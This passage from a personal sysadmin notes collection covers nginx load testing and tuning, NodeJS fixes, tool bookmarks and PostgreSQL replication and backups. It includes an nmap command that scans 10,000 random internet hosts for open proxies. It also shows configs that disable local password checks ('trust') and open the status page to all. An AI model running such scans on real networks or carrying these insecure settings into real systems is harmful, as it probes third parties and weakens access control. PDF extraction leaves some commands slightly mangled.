˓→nginx $ ab -n 150000 -c 20000 http://127.0.0.1/ $ ab -n 300000 -c 20000 http://127.0.0.1/ $ ab -k -n 5000000 -c 20000 http://127.0.0.1/ $ ab -k -c 10 -t 60 -n 10000000 http://127.0.0.1/

36.1. Tips 253 Omid Raha MyStack Documentation, Release 0.1

# worker_processes 1; # worker_connections 1,000;

# Failed requests: 0 $ ab -n1,000,000 -c1,000 127.0.0.1/bin/tar

# Failed requests: 0 $ ab -n1,000,000 -c 500 127.0.0.1/bin/tar

# Failed requests: 191 $ ab -n1,000,000 -c1,000 127.0.0.1/bin/tar

# Failed requests: 77158 $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

# Failed requests: 24346 $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

# worker_processes 4; # worker_connections 1,000;

# Failed requests: 38067 $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

# worker_processes 4; # worker_connections 10,000;

# Failed requests: 0 # Time per request: 0.509 [ms] $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

# worker_processes 1; # worker_connections 10,000;

# Failed requests: 0 # Time per request: 0.509 [ms] $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

# worker_processes 1; # worker_connections 10,000;

# Failed requests: 0 # Time per request: 0.509 [ms] $ ab -n 100,000 -c 20,000 127.0.0.1/bin/tar

# worker_processes 1; # worker_connections 10,000;

# Failed requests: 0 # Time per request: 0.544 [ms] $ ab -n 100,000 -c 10,000 127.0.0.1/bin/tar

Errors:

# 2016/05/04 10:57:09 [alert] 6#6: 1000 worker_connections are not enough 2016/05/04 11:39:44[crit]6 #6: accept4() failed (24: Too many open files)

254 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1 https://www.scalescale.com/tips/nginx/nginx-accept-failed-24-too-many-open-files/ http://www.cyberciti.biz/faq/linux-unix-nginx-too-many-open-files/ http://serverfault.com/questions/516802/too-many-open-files-with-nginx-cant-seem-to-raise-limit

36.1.26 apache benchmark

-c: (“Concurrency”). Indicates how many clients (people/users) will be hitting the site at the same time. While ab runs, there will be -c clients hitting the site. This is what actually decides the amount of stress your site will suffer during the benchmark. -n: Indicates how many requests are going to be made. This just decides the length of the benchmark. A high -n value with a -c value that your server can support is a good idea to ensure that things don’t break under sustained stress: it’s not the same to support stress for 5 seconds than for 5 hours. -k: This does the “KeepAlive” funcionality browsers do by nature. You don’t need to pass a value for -k as it it “boolean” (meaning: it indicates that you desire for your test to use the Keep Alive header from HTTP and sustain the connection). Since browsers do this and you’re likely to want to simulate the stress and flow that your site will have from browsers, it is recommended you do a benchmark with this. The final argument is simply the host. By default it will hit http:// protocol if you don’t specify it. http://stackoverflow.com/questions/12732182/ab-load-testing http://serverfault.com/questions/274253/apache-ab-choosing-number-of-concurrent-connections http://www.pinkbike.com/u/radek/blog/Apache-Bench-you-probably-are-using-the-t-timelimit-option-incor.html

"apr_socket_recv: Connection reset by peer (104)"

$ sudo /sbin/sysctl -a | grep net.ipv4.tcp_max_syn_backlog net.ipv4.tcp_max_syn_backlog= 512

$ sudo /sbin/sysctl -a | grep net.core.somaxconn net.core.somaxconn= 128

$ sudo /sbin/sysctl -w net.ipv4.tcp_max_syn_backlog=1024

$ sudo /sbin/sysctl -w net.core.somaxconn=256 http://stackoverflow.com/questions/30794548/about-the-concurrency-of-docker http://blog.scene.ro/posts/apache-benchmark-apr_socket_recv/ https://easyengine.io/tutorials/php/fpm-sysctl-tweaking/ https://easyengine.io/tutorials/linux/sysctl-conf/ http://community.rtcamp.com/t/hitting-a-limit-with-the-tuning-or-am-i/831 http://serverfault.com/questions/231516/http-benchmarking http://serverfault.com/questions/146605/understanding-this-error-apr-socket-recv-connection-reset-by-peer-104 The keepalive_timeout has nothing to do with the concurrent connections per second. In fact, nginx can close an idle connection at any time when it reaches the limit of worker_connections. What’s really important is the connections that nginx cannot close. The active ones. How long the connection is active depends on the request processing time.

36.1. Tips 255 Omid Raha MyStack Documentation, Release 0.1

The approximate calculation looks like this: worker_processes * worker_connections * K / average $request_time where K is the average number of connections per request (for example, if you do proxy pass, then nginx needs additional connection to your backend). http://nginx.org/en/docs/http/ngx_http_core_module.html#var_request_time https://blog.martinfjordvald.com/2011/04/optimizing-nginx-for-high-traffic-loads/ Nginx as a HTTP server: Max_clients = worker_processes * worker_connections Nginx as a reverse : Max_clients = worker_processes * worker_connections/4 https://loader.io/

36.1.27 HTTP Keepalive Connections and Web Performance | NGINX

Modern web browsers typically open 6 to 8 keepalive connections and hold them open for several minutes before timing them out. Web servers may be configured to time these connections out and close them sooner. If lots of clients use HTTP keepalives and the web server has a concurrency limit or scalability problem, then perfor- mance plummets once that limit is reached. NGINX’s HTTP-caching feature can cache responses from the upstream servers, following the standard cache seman- tics to control what is cached and for how long. If several clients request the same resource, NGINX can respond from its cache and not burden upstream servers with duplicate requests. https://www.nginx.com/blog/http-keepalives-and-web-performance/ https://www.nginx.com/blog/tuning-nginx/

36.1.28 Nginx Caching

By default, NGINX respects the Cache-Control headers from origin servers. It does not cache responses with Cache- Control set to Private, No-Cache, or No-Store or with Set-Cookie in the response header. NGINX only caches GET and HEAD client requests. https://www.nginx.com/resources/wiki/start/topics/examples/reverseproxycachingexample/ https://www.nginx.com/blog/nginx-caching-guide/

36.1.29 Optimizing NGINX Speed for Serving Content https://www.nginx.com/resources/admin-guide/serving-static-content/ http://stackoverflow.com/questions/4839039/tuning-nginx-centos-for-server-lots-of-static-content http://blog.octo.com/en/http-caching-with-nginx-and-memcached/ https://github.com/bpaquet/ngx_http_enhanced_memcached_module

256 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

36.1.30 Fastest server for static files serving http://gwan.com/benchmark http://www.wikivs.com/wiki/G-WAN_vs_Nginx Mount your document root as a ramdisk. Cache full responses to most common queries rather than rebuilding the http. Tweaking swappiness (or having no swap at all) Firewall load balancing DNS load balancing Geolocation load balancing Turning off logging/hostname resolution/various lookups. Many cores, big pipes. Mounting file system with noatime http://stackoverflow.com/questions/13554706/fastest-server-for-static-files-serving http://serverfault.com/a/443633 https://nbonvin.wordpress.com/2011/03/24/serving-small-static-files-which-server-to-use/ https://github.com/eucalyptus/architecture/blob/master/features/elb/3.3/elb-benchmark.wiki

36.1.31 Sample Nginx load balancing nginx_lb: user nginx; worker_processes1; worker_rlimit_nofile 100000; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events{ worker_connections 1024; use epoll; multi_accept on; accept_mutex on;

} http{

include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' (continues on next page)

36.1. Tips 257 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) '"$http_user_agent" "$http_x_forwarded_for"' '$request_time';

access_log off;

sendfile on;

keepalive_timeout 15;

aio on; directio 4m; tcp_nopush on; tcp_nodelay on;

upstream web_server{

server 192.168.1.119:81; server 192.168.1.119:82; }

server{ server_name _; charset utf-8; client_max_body_size 50M; proxy_intercept_errors on; # proxy_max_temp_file_size 0;

location /{

proxy_pass http://web_server; }

# Server status location= /status{ stub_status on; allow all; }

}

include /etc/nginx/conf.d/*.conf; } nginx_cdn: user nginx; worker_processes1; worker_rlimit_nofile 100000; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events{ worker_connections 1024; use epoll; multi_accept on; (continues on next page)

258 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) accept_mutex on;

} http{

include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"' '$request_time';

# access_log /var/log/nginx/access.log main; access_log off;

sendfile on;

keepalive_timeout 15;

gzip on;

aio on; directio 4m; tcp_nopush on; tcp_nodelay on;

server{ server_name _; charset utf-8; client_max_body_size 50M; proxy_intercept_errors on;

location /{ autoindex on; alias/; }

location= /status{ stub_status on; allow all; }

}

include /etc/nginx/conf.d/*.conf; }

36.1. Tips 259 Omid Raha MyStack Documentation, Release 0.1

260 Chapter 36. Nginx CHAPTER 37

Nmap

Contents:

37.1 Scan Options

37.1.1 Find open Proxies

# nmap -iR 10000 -sS -p8000,8080,8123,8181,3128,1080 -PS8000,8080,8123,8181,3128,1080

˓→-n --script=http-open-proxy,socks-open-proxy --open -v

261 Omid Raha MyStack Documentation, Release 0.1

262 Chapter 37. Nmap CHAPTER 38

NodeJS

Contents:

38.1 Tips

38.1.1 run npm command gives error “/usr/bin/env: node: No such file or directory”

$ ln -s /usr/bin/nodejs /usr/bin/node" https://github.com/nodejs/node-v0.x-archive/issues/3911

38.1.2 Grunt “Command Not Found” Error in Terminal

$ RUN npm install -g grunt-cli

263 Omid Raha MyStack Documentation, Release 0.1

264 Chapter 38. NodeJS CHAPTER 39

Notes

Contents:

39.1 Tips

39.2 Terminology

Internationalization Preparing the software for localization. Usually done by developers. Localization Writing the translations and local formats. Usually done by translators.

39.3 Bookmarks

39.3.1 Decoder http://www.showmycode.com/

39.3.2 Dns Online Tools http://viewdns.info/ http://whois.nic.ir/Query_Whois_Server http://www.dnsinspect.com/

265 Omid Raha MyStack Documentation, Release 0.1

39.3.3 Online Virus Check http://www.virscan.org/ https://www.virustotal.com/en/ https://www.metascan-online.com/ http://virusscan.jotti.org/en

39.3.4 Browser Security Check http://www.pcflank.com/index.htm http://www.browserleaks.com/ https://browsercheck.qualys.com/ http://www.browserscope.org/ https://panopticlick.eff.org/ https://www.grc.com/x/ne.dll?bh0bkyd2 http://www.enhanceie.com/test/clickjack/ http://deaduseful.com/browsercheck/ https://www.ssllabs.com/ssltest/viewMyClient.html http://detectmybrowser.com/ http://browserspy.dk/fonts-flash.php

39.3.5 Temporary Email Address http://temp-mail.org/ https://www.guerrillamail.com/inbox?mail_id=1 http://10minutemail.com/10MinuteMail/index.html

39.3.6 Css compressor http://www.lotterypost.com/css-compress.aspx

39.3.7 Online compiler and executable for codes http://www.compileonline.com/

39.3.8 Character references http://dev.w3.org/html5/html-author/charref

266 Chapter 39. Notes Omid Raha MyStack Documentation, Release 0.1

39.3.9 Malware Analysis for Unknown Binaries https://anubis.iseclab.org/ http://jevereg.amnpardaz.com/

39.3.10 Blog security http://expertmiami.blogspot.de/

39.3.11 Online device search engine https://www.shodan.io

39.3.12 Online Pentest Tools https://pentest-tools.com/home

39.3.13 Robtex Swiss Army Knife Internet Tool https://www.robtex.com/

39.3. Bookmarks 267 Omid Raha MyStack Documentation, Release 0.1

268 Chapter 39. Notes CHAPTER 40

Perl

Contents:

40.1 Tips

40.1.1 Install Module

$ # perl -MCPAN -e shell cpan[1]> install String::Random

269 Omid Raha MyStack Documentation, Release 0.1

270 Chapter 40. Perl CHAPTER 41

Piano

Contents:

41.1 Tips

41.1.1 Setting up Virtual MIDI Piano Keyboard in Ubuntu

$ sudo apt-get install vmpk vkeybd $ sudo apt-get install amsynth $ sudo apt-get install qjackctl

After installing above packages we need to connect the vmpk with amsynth through qjackctl, because vmpk doesn’t produce sound by itself. Lanuch Vmpk, Amsynth, Qjackctl one by one. vmpk output > vmpk input vmpk outpu > amsynth MIDI IN https://sathisharthars.com/2014/03/01/setting-up-virtual-midi-piano-keyboard-in-ubuntu/ https://www.youtube.com/watch?v=827jmswqnEA

271 Omid Raha MyStack Documentation, Release 0.1

272 Chapter 41. Piano CHAPTER 42

PostgreSQL

Contents:

42.1 Tips

42.1.1 fix psql: FATAL: role “” does not exist error

$ psql psql: FATAL: role "" does not exist

$ sudo adduser postgres $ sudo passwd postgres

$ su - postgres postgres@local:~$ psql psql(9.1.13) Type "help" for help. postgres=#

42.1.2 List all databases

$ su - postgres postgres@local:~$ psql postgres=# \list # \l List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges ------+------+------+------+------+------postgres | postgres | SQL_ASCII | C | C | template0 | postgres | SQL_ASCII | C | C |=c/postgres + (continues on next page)

273 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) | | | | | postgres=CTc/postgres template1 | postgres | SQL_ASCII | C | C |=c/postgres + | | | | | postgres=CTc/postgres (3 rows) postgres=#

42.1.3 list user accounts

$ su - postgres postgres@local:~$ psql postgres=# \du List of roles Role name | Attributes | Member of ------+------+------postgres | Superuser, Create role, Create DB, Replication |{} postgres=#

42.1.4 CREATE Database

$ su - postgres postgres@local:~$ psql postgres=# CREATE DATABASE testdb;

42.1.5 Add or create a user account and grant permission for database

$ su - postgres postgres@local:~$ psql postgres=# CREATE USER WITH PASSWORD ''; postgres=# CREATE DATABASE test_db; postgres=# GRANT ALL PRIVILEGES ON DATABASE to ; postgres=# \q

42.1.6 Get the Size of a Postgres Table postgres@ubuntu:~$ psql -d database_name -c "select pg_size_pretty(pg_relation_size(

˓→'table_name'));"

274 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

42.1.7 Quit from psql postgres=# \q postgres@83abf5fff8e0:~$ whoami postgres

42.1.8 Connect to postgres from bash

In root bash:

$ su - postgres $ psql

Or:

$ sudo -u postgres psql

42.1.9 Allow localhost to connect to postgres without password checking

# vim /etc/postgresql/9.4/main/pg_hba.conf

# "local" is for Unix domain socket connections only local all all trust # peer # IPv4 local connections: host all all 127.0.0.1/32 trust # md5 # IPv6 local connections: host all all ::1/128 trust # md5

42.1.10 Postgres on Docker

$ docker pull postgres

$ docker run --name postgres-01 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=postgres postgres

Expose Ports: 5432 Data Directories: /var/lib/postgresql/data/ https://hub.docker.com/_/postgres/

Warm Standby

Its introduced in PostgreSQL 8.3(IIRC). 1. It is based on WAL log shipping which typically means WAL archives generated on Master will be transferred and applied at Standby side. So Warm Standby always waits for the WAL archive in which Master is currently

42.1. Tips 275 Omid Raha MyStack Documentation, Release 0.1

writing and keeps throw messages like “cp: cannot stat : No such file or directory”. So it is always one archive behind than Master and data loss will be max of 16MB(assuming a healthy warm standby by :-) ) 2. In postgresql.conf file, you would need to change just three parameters in master; wal_level to archive, archive_mode and archive_command, however nothing in postgresql.conf file at standby side. On Master: wal_level= archive archive_mode= on archive_command= 'cp %p /path_to/archive/%f'

3. In recovery.conf file, three parameters; standby_mode, restore_command and trigger_file. 4. You cannot connect to Standby, so database is not even open for read operations (or read operations are not permitted on db). Detailed explanation and related docs are here: http://wiki.postgresql.org/wiki/Warm_Standby

Hot Standby

Its introduce in PostgreSQL 9.0. 1. It is also based on WAL log shipping(same as warm standby). And of-course, WALs will be transferred and applied at Standby, so one WAL behind and always waits for the WAL archive in which Master is currently writing. 2. In postgresql.conf file, you would need to change wal_level to hot_standby, archive_mode and archive_command. Since you’ll likely want to use pg_basebackup you should also set max_wal_senders to at least 2 or 3. And hot_stanby = on in standby conf file. On Master: wal_level= hot_standby max_wal_senders=5 wal_keep_segments= 32 archive_mode= on archive_command= 'cp %p /path_to/archive/%f'

On Slave: hot_standby= on

3. In recovery.conf file, three parameters; standby_mode, restore_command and trigger_file. 4. You can connect to Standby for read queries(you should set hot_stanby to ON in standby postgresql.conf file). Detailed explanation and related docs are here: http://wiki.postgresql.org/wiki/Hot_Standby

Steaming Replication

Its introduced in PostgreSQL 9.0. 1. XLOG records generated in the primary are periodically shipped to the standby via the network. XLOG records shipped are replayed as soon as possible without waiting until XLOG file has been filled. The combination of Hot Standby and SR would make the latest data inserted into the primary visible in the standby almost immediately. So minimal data loss(almost only open transactions will be lost if its async rep, 0 loss if it is sync rep) 2. In postgresql.conf file, this time 5 parameters, streaming related params like below: On Master:

276 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

wal_level= hot_standby max_wal_senders=5 wal_keep_segments= 32 archive_mode= on archive_command= 'cp %p /path_to/archive/%f'

On Slave: hot_standby=on

3. In recovery.conf file, you would need to an extra parameter including three which you add in hot/warm standby. i.e primary_conninfo, so below are four parameters: standby_mode= 'on' primary_conninfo= 'host=192.168.0.10 port=5432 user=postgres' trigger_file= '/path_to/trigger' restore_command= 'cp /path_to/archive/%f "%p"'

4. You can connect to Standby for read queries(you should set hot_stanby to ON in standby postgresql.conf file). Detailed explanation and related docs are here: http://wiki.postgresql.org/wiki/Streaming_Replication&& http://bajis-postgres.blogspot.in/2013/12/step-by-step-guide-to-setup-steaming.html

42.1.11 Difference between Warm, hot standby and Streaming Replication: http://bajis-postgres.blogspot.com/2014/04/difference-between-warm-hot-standby-and.html

42.1.12 Zero to PostgreSQL streaming replication in 10 mins http://www.rassoc.com/gregr/weblog/2013/02/16/zero-to-postgresql-streaming-replication-in-10-mins/ https://wiki.postgresql.org/wiki/Binary_Replication_Tutorial http://dba.stackexchange.com/questions/58960/configure-postgresql-recovery-again-to-be-slave http://evol-monkey.blogspot.com/2014/01/setting-up-postgres-automated-failover.html http://www.repmgr.org/

42.1.13 Understanding and controlling crash recovery

If PostgreSQL crashes there will be a message in the server log with severity-level PANIC . PostgreSQL will immedi- ately restart and attempt to recover using the transaction log or Write Ahead Log (WAL) The WAL consists of a series of files written to the pg_xlog subdirectory of the PostgreSQL data directory. Each change made to the database is recorded first in WAL, hence the name “write-ahead” log. When a transaction commits, the default and safe behavior is to force the WAL records to disk. If PostgreSQL should crash, the WAL will be replayed, which returns the database to the point of the last committed transaction, and thus ensures the durability of any database changes. Note that the database changes themselves aren’t written to disk at transaction commit. Those changes are written to disk sometime later by the “background writer” on a well-tuned server. Crash recovery replays the WAL, though from what point does it start to recover? Recovery starts from points in the WAL known as “checkpoints”. The duration of crash recovery depends upon the number of changes in the transaction log since the last checkpoint. A checkpoint is a known safe starting point for recovery, since at that time we write all

42.1. Tips 277 Omid Raha MyStack Documentation, Release 0.1 currently outstanding database changes to disk. A checkpoint can become a performance bottleneck on busy database servers because of the number of writes required. There are a number of ways of tuning that, though please also understand the effect on crash recovery that those tuning options may cause. Two parameters control the amount of WAL that can be written before the next checkpoint. The first is checkpoint_segments, which controls the number of 16 MB files that will be written before a checkpoint is triggered. The second is time-based, known as checkpoint_timeout, and is the number of seconds until the next checkpoint. A checkpoint is called whenever either of those two limits is reached. It’s tempting to banish checkpoints as much as possible by setting the following parameters: checkpoint_segments = 1000 checkpoint_timeout = 3600 though if you do you might give some thought to how long the recovery will be if you do and whether you want that. Also, you should make sure that the pg_xlog directory is mounted on disks with enough disk space for at least 3 x 16 MB x checkpoint_segments. Put another way, you need at least 32 GB of disk space for checkpoint_segments = 1000 . If wal_keep_segments > 0 then the server can also use up to 16MB x (wal_keep_segments + checkpoint_segments). Recovery continues until the end of the transaction log. We are writing this continually, so there is no defined end point; it is literally the last correct record. Each WAL record is individually CRC checked, so we know whether a record is complete and valid before trying to process it. Each record contains a pointer to the previous record, so we can tell that the record forms a valid link in the chain of actions recorded in WAL. As a result of that, recovery always ends with some kind of error reading the next WAL record. That is normal. Recovery performance can be very fast, though it does depend upon the actions being recovered. The best way to test recovery performance is to setup a standby replication server, described in the chapter on Replication http://www.treatplanner.com/docs/PostgreSQL-9-Admin-Cookbook-eBook16112010_1048648.pdf

42.1.14 Synchronous Replication

PostgreSQL streaming replication is asynchronous by default. If the primary server crashes then some transactions that were committed may not have been replicated to the standby server, causing data loss. The amount of data loss is proportional to the replication delay at the time of failover. http://www.postgresql.org/docs/9.4/static/warm-standby.html if data changes are acknowledged as sent from Master to Standby before transaction commit is acknowledged, we refer to that as synchronous replication. If data changes are sent after a transaction commits, we name that asynchronous replication. With synchronous replication, the replication delay directly affects performance on the Master. With asynchronous replication the Master may continue at full speed, though this opens up a possible risk that the Standby may not be able to keep pace with the Master. All asynchronous replication must be monitored to ensure that a significant lag does not develop, which is why we must be careful to monitor the replication delay. http://www.treatplanner.com/docs/PostgreSQL-9-Admin-Cookbook-eBook16112010_1048648.pdf Checkpoints are points in the sequence of transactions at which it is guaranteed that the heap and index data files have been updated with all information written before that checkpoint. At checkpoint time, all dirty data pages are flushed to disk and a special checkpoint record is written to the log file. (The change records were previously flushed to the WAL files.) In the event of a crash, the crash recovery procedure looks at the latest checkpoint record to determine the point in the log (known as the redo record) from which it should start the REDO operation. Any changes made to data files before that point are guaranteed to be already on disk. Hence, after a checkpoint, log segments preceding the one containing the redo record are no longer needed and can be recycled or removed. (When WAL archiving is being done, the log segments must be archived before being recycled or removed.) http://www.postgresql.org/docs/9.3/static/wal-configuration.html Postgres was designed with ACID properties in mind. This is reflected in the way it works and stores data, at the core of which is the Write-Ahead Log (WAL). Amongst other things, the WAL allows for atomic transactions and

278 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1 data-safety in the face of a crash. http://www.anchor.com.au/documentation/better-postgresql-backups-with-wal-archiving/ wal_level determines how much information is written to the WAL. The default value is minimal, which writes only the information needed to recover from a crash or immediate shutdown. archive adds logging required for WAL archiving; hot_standby further adds information required to run read-only queries on a standby server; and, finally logical adds information necessary to support logical decoding. Each level includes the information logged at all lower levels. This parameter can only be set at server start. http://www.postgresql.org/docs/9.4/static/runtime-config-wal.html#GUC-WAL-LEVEL http://www.anchor.com.au/documentation/better-postgresql-backups-with-wal-archiving/

42.1.15 When will PostgreSQL execute archive_command to archive wal files?

The archive command is executed every time it switches the archive log to a new one. Which as you say can be triggered manually by calling the pg_switch_xlog() function. Other than that, an archive log needs to be changed to a new one when it is full, which by default is when it reaches 16MB, but can be changed at compile time. You can also specify a timeout value using the parameter archive_timeout which will execute the command after the set amount of seconds, which is useful for databases that have low activity. http://dba.stackexchange.com/questions/51578/when-will-postgresql-execute-archive-command-to-archive-wal-files http://www.postgresql.org/docs/current/static/continuous-archiving.html#BACKUP-SCRIPTS http://thedulinreport.com/2015/01/31/configuring-master-slave-replication-with-postgresql/ The two important options for dealing with the WAL for streaming replication: wal_keep_segments should be set high enough to allow a slave to catch up after a reasonable lag (i.e. high update volume, slave being offline, etc. . . ). archive_mode enables WAL archiving which can be used to recover files older than wal_keep_segments provides. The slave servers simply need a method to retrieve the WAL segments. NFS is the simplest method, but anything from scp to http to tapes will work so long as it can be scripted. # on master archive_mode = on archive_command = ‘cp %p /path_to/archive/%f’ # on slave restore_command = ‘cp /path_to/archive/%f “%p”’ When the slave can’t pull the WAL segment directly from the master, it will attempt to use the re- store_command to load it. You can configure the slave to automatically remove segments using the archive_cleanup_commandsetting. http://stackoverflow.com/questions/28201475/how-do-i-fix-a-postgresql-9-3-slave-that-cannot-keep-up-with-the-master http://www.mkyong.com/database/postgresql-point-in-time-recovery-incremental-backup/ http://www.pgbarman.org/faq/

42.1.16 Binary Replication Tools https://wiki.postgresql.org/wiki/Binary_Replication_Tools

42.1. Tips 279 Omid Raha MyStack Documentation, Release 0.1

42.1.17 warm standby or log shipping

A standby server can also be used for read-only queries, in which case it is called a Hot Standby server. http://www.postgresql.org/docs/current/interactive/warm-standby.html https://wiki.postgresql.org/wiki/Hot_Standby https://momjian.us/main/writings/pgsql/hot_streaming_rep.pdf It should be noted that log shipping is asynchronous, i.e., the WAL records are shipped after transaction commit. As a result, there is a window for data loss should the primary server suffer a catastrophic failure; transactions not yet shipped will be lost. The size of the data loss window in file-based log shipping can be limited by use of the archive_timeout parameter, which can be set as low as a few seconds. However such a low setting will substantially increase the bandwidth required for file shipping. Streaming replication (see Section 25.2.5) allows a much smaller window of data loss.

42.1.18 Streaming Replication

Log-Shipping Standby Servers Streaming replication allows a standby server to stay more up-to-date than is possible with file-based log shipping. The standby connects to the primary, which streams WAL records to the standby as they’re generated, without waiting for the WAL file to be filled. Streaming replication is asynchronous by default, in which case there is a small delay between committing a transaction in the primary and the changes becoming visible in the standby. This delay is however much smaller than with file- based log shipping, typically under one second assuming the standby is powerful enough to keep up with the load. With streaming replication, archive_timeout is not required to reduce the data loss window. If you use streaming replication without file-based continuous archiving, the server might recycle old WAL segments before the standby has received them. If this occurs, the standby will need to be reinitialized from a new base backup. You can avoid this by setting wal_keep_segments to a value large enough to ensure that WAL segments are not recycled too early, or by configuring a replication slot for the standby. If you set up a WAL archive that’s accessible from the standby, these solutions are not required, since the standby can always use the archive to catch up provided it retains enough segments. To use streaming replication, set up a file-based log-shipping standby server as described in Section 25.2. The step that turns a file-based log-shipping standby into streaming replication standby is setting primary_conninfo setting in the recovery.conf file to point to the primary server. Set listen_addresses and authentication options (see pg_hba.conf) on the primary so that the standby server can connect to the replication pseudo-database on the primary server. http://www.postgresql.org/docs/current/interactive/warm-standby.html#STREAMING-REPLICATION

42.1.19 Introduction to Binary Replication

Binary replication is also called “Hot Standby” and “Streaming Replication” which are two separate, but complimen- tary, features of PostgreSQL 9.0 and later. Here’s some general information about how they work and what they are for.

42.1.20 PITR

In Point-In-Time Recovery (PITR), transaction logs are copied and saved to storage until needed. Then, when needed, the Standby server can be “brought up” (made active) and transaction logs applied, either stopping when they run out

280 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1 or at a prior point indicated by the administrator. PITR has been available since PostgreSQL version 8.0, and as such will not be documented here. PITR is primarily used for database forensics and recovery. It is also useful when you need to back up a very large database, as it effectively supports incremental backups, which pg_dump does not.

42.1.21 Warm Standby

In Warm Standby, transaction logs are copied from the Master and applied to the Standby immediately after they are received, or at a short delay. The Standby is offline (in “recovery mode”) and not available for any query workload. This allows the Standby to be brought up to full operation very quickly. Warm Standby has been available since version 8.3, and will not be fully documented here. Warm Standby requires Log Shipping. It is primary used for database failover.

42.1.22 Hot Standby

Hot Standby is identical to Warm Standby, except that the Standby is available to run read-only queries. This offers all of the advantages of Warm Standby, plus the ability to distribute some business workload to the Standby server(s). Hot Standby by itself requires Log Shipping. Hot Standby is used both for database failover, and can also be used for load-balancing. In contrast to Streaming Replication, it places no load on the master (except for disk space requirements) and is thus theoretically infinitely scalable. A WAL archive could be distributed to dozens or hundreds of servers via network storage. The WAL files could also easily be copied over a poor quality network connection, or by SFTP. However, since Hot Standby replicates by shipping 16MB logs, it is at best minutes behind and sometimes more than that. This can be problematic both from a failover and a load-balancing perspective.

42.1.23 Streaming Replication

Streaming Replication improves either Warm Standby or Hot Standby by opening a network connection between the Standby and the Master database, instead of copying 16MB log files. This allows data changes to be copied over the network almost immediately on completion on the Master. In Streaming Replication, the master and the standby have special processes called the walsender and walreceiver which transmit modified data pages over a network port. This requires one fairly busy connection per standby, im- posing an incremental load on the master for each additional standby. Still, the load is quite low and a single master should be able to support multiple standbys easily. Streaming replication does not require log shipping in normal operation. It may, however, require log shipping to start replication, and can utilize log shipping in order to catch up standbys which fall behind. https://wiki.postgresql.org/wiki/Binary_Replication_Tutorial#5_Minutes_to_Simple_Replication

42.1.24 Safe way to check for PostgreSQL replication delay/lag http://www.postgresql.org/message-id/CADKbJJWz9M0swPT3oqe8f9+tfD4-F54uE6Xtkh4nERpVsQnjnw@mail. .com http://blog.2ndquadrant.com/monitoring-wal-archiving-improves-postgresql-9-4-pg_stat_archiver/

42.1. Tips 281 Omid Raha MyStack Documentation, Release 0.1

42.1.25 Does PostgreSQL 9.1 Streaming Replication catch up after a lag without WAL archiving?

http://dba.stackexchange.com/q/10540 http://dba.stackexchange.com/questions/100633/postgres-streaming-replication-how-to-re-sync-data-in-master-with-standby- aft# http://dba.stackexchange.com/questions/90896/recovery-when-failover http://www.postgresql.org/docs/9.2/static/pgstandby.html http://blog.2ndquadrant.com/getting-wal-files-from-barman-with-get-wal/ http://blog.2ndquadrant.com/configuring-retention-policies-in-barman/

42.1.26 archive_command

When the archive_command fails, it will repeatedly retry until it succeeds. PostgreSQL does not remove WAL files from pg_xlog until the WAL files have been successfully archived, so the end result is that your pg_xlog directory fills up. It’s a good idea to have an archive_command that reacts better to that condition, though that is left as an improvement for the sysadmin. Typical action is to make that an emergency call out so we can resolve the problem manually. Automatic resolution is difficult to get right as this condition is one for which it is hard to test. http://www.postgresql.org/docs/9.0/static/runtime-config-wal.html#GUC-ARCHIVE-COMMAND The archive_command is only invoked for completed WAL segments.

archive_command= 'test ! -f /mnt/server/archivedir/%f && cp %p /mnt/server/

˓→archivedir/%f' # Unix

test ! -f /mnt/server/archivedir/00000001000000A900000065&& cp pg_xlog/00000001000000A900000065 /mnt/server/archivedir/00000001000000A900000065

It is important that the archive command return zero exit status if and only if it succeeds. Upon getting a zero result, PostgreSQL will assume that the file has been successfully archived, and will remove or recycle it. However, a nonzero status tells PostgreSQL that the file was not archived; it will try again periodically until it succeeds. The archive command is only invoked on completed WAL segments. Hence, if your server generates only little WAL traffic (or has slack periods where it does so), there could be a long delay between the completion of a transaction and its safe recording in archive storage. To put a limit on how old unarchived data can be, you can set archive_timeout to force the server to switch to a new WAL segment file at least that often. Note that archived files that are archived early due to a forced switch are still the same length as completely full files. It is therefore unwise to set a very short archive_timeout — it will bloat your archive storage. archive_timeout settings of a minute or so are usually reasonable Also, you can force a segment switch manually with pg_switch_xlog if you want to ensure that a just-finished trans- action is archived as soon as possible.

42.1.27 base backup

In each base backup you will find a file called backup_label. The earliest WAL file required by a physical backup is the filename mentioned on the first line of the backup_label file. We can use a contrib module called pg_archivecleanup to remove any WAL files earlier than the earliest file. http://www.postgresql.org/docs/9.1/static/continuous-archiving.html

282 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

42.1.28 pg_basebackup pg_basebackup -d 'connection string' -D /path/to_data_dir

For PostgreSQL 9.2 and later versions, you are advised to use the following additional option on the pg_basebackup command line. This option allows the required WAL files to be streamed alongside the base backup on a sec- ond session, greatly improving the startup time on larger databases, without the need to fuss over large settings of wal_keep_segments (as seen in step 6 of the previous procedure):

--xlog-method=stream

For PostgreSQL 9.4 and later versions, if the backup uses too many server resources (CPU, memory, disk, or band- width), you can throttle down the speed for the backup using the following additional option on the pg_basebackup command line. The RATE value is specified in kB/s by default:

